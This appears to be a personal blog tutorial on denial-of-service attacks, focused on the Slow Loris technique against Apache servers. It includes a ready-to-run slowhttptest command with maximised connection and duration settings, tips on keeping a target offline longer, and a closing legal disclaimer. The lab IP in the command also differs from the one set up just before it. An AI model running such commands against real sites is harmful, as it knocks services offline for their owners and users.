What is a DoS attack?
Okay, so if you’re unfamiliar with the concept of a DoS attack (Denial of Service), the traditional idea is that you spam a website (or game server, or work station, etc) with enough data that it becomes overloaded and cannot serve its purpose (like serving web pages or running a Minecraft server).
Normally, this is done with pure internet traffic: you just launch a crap ton of TCP requests at a server until its internet provider can’t handle the capacity. The problem with that approach is that you need to have a stronger total internet connection than your target. Easy fix: add more attackers. A DDoS attack (Distributed Denial of Service) is when you have a collection of attackers flooding a single target with traffic. But of course, that means that you need a collection of computers that you can bend to your will, like a botnet (or you can just buy one).
But in both scenarios, you’re not going to be able to take down people with powerful internet connections, like most websites do. So how can we fix that?
Strategic DoS Attacks
Those types of DoS attacks use brute force – “my gun is bigger than your gun” – and aren’t generally very efficient. So instead of a hacker attacking the target’s internet, they attack the target’s software. Websites run on programs, called web servers, that process requests from browsers and serve users webpages. Sometimes, web servers have flaws. If a hacker can exploit one of these vulnerabilities, they may be able to crash a website, or even get inside and change it.
That’s where we arrive here. One of the most popular web servers is called Apache2 (or just Apache). Apache is very easy to configure, and is a popular choice for beginners. Still, even some popular websites use it. But Apache has a flaw: it’s very bad at managing simultaneous connections.
Unfortunately, as a program, Apache is very bulky and memory-hungry. Every time a user requests a webpage, it starts a new thread, allocating vital resources. So to help reduce the bloat, the programmers built in a system where it only allows a certain number of simultaneous connections (on my setup, it was 200 connections). After that threshold, the server must wait for a connection to stop before it can serve another.
You can see where I’m headed with this, aren’t you?
Based on that fact, all an attacker has to do is start a bunch of connections to the target website running Apache, and the website will effectively go offline; nobody else will be able to access it. To do this, the attacker has to start the connection, then send data very very slowly, so that Apache has to wait, keeping the connection open, and taking up vital resources. This is called a Slow Loris attack.
The difference between this and traditional DoS attacks? You don’t need a massive internet connection. All you need is a little bit of code that can pull it off.
The Nitty-Gritty
Best of all, that code is free. If you have a tiny Linux computer, just install the package “slowhttptest”
If you’re running Debian like I do, that’s as simple as “apt install slowhttptest”
After that, you have all the software you need to run a Slow Loris attack. Go ahead and spin up a quick Apache2 server. Let’s say the IP address is 10.0.0.2. All you have to do to run the attack is, on your attacker machine with slowhttptest, run:
slowhttptest -c 65539 -l 2147483647 -u http://10.0.0.1/
Those are some weird numbers, but it’s pretty simplistic. It basically ensures that the program will do its best to overload the target, because the defaults for these values are too low. The values we just set are the maximums. Let’s take a look at the options we chose:
-c is the max number of connections it will try to make. The default is 50, which is below most thresholds that Apache sets. Remember, if there is even 1 unoccupied thread on the server, it will be able to serve users, so we need to overcompensate hardcore.
-l is the length of time (in seconds) that the program will run. By default, this is just 4 minutes. If you want to take the target down for longer, you’ll need to max it out like we did.
-u is the target URL. Something important to note here is that slowhttptest is a very poorly written program. It doesn’t correct any mistakes you make, so entering the URL in exactly is essential. You need to make sure that it starts with “http://” or “https://” depending on which the website uses, and you need to make sure that it ends with “/”
You’ll see eventually, if the website is running Apache, the program will report “Service available: NO”
But if you continue to run the attack, and it continues to report that the service is available even after your number of connections rise past 1000, then the website is probably not vulnerable. A lot of popular websites run under Nginx instead of Apache. Nginx is much better at handling simultaneous connections, and can easily handle thousands of requests on a low-end web host. I recently migrated from Apache2 to Nginx, which is what sparked the creation of this post.
That’s all there is to it. It uses very little bandwidth and resources on your end; so much so that you can even run it on something as small as a Raspberry Pi connected to a 1 megabit internet connection!
Disclaimer
Though this should be obvious, I feel like I have to put a disclaimer at the bottom of all my articles regarding cyberattacks.
YES, it is illegal to run this application against a website that you do not have permission to do so on. Denial of Service attacks are very detrimental to the welfare of websites, and attacking them would make their owners very very mad.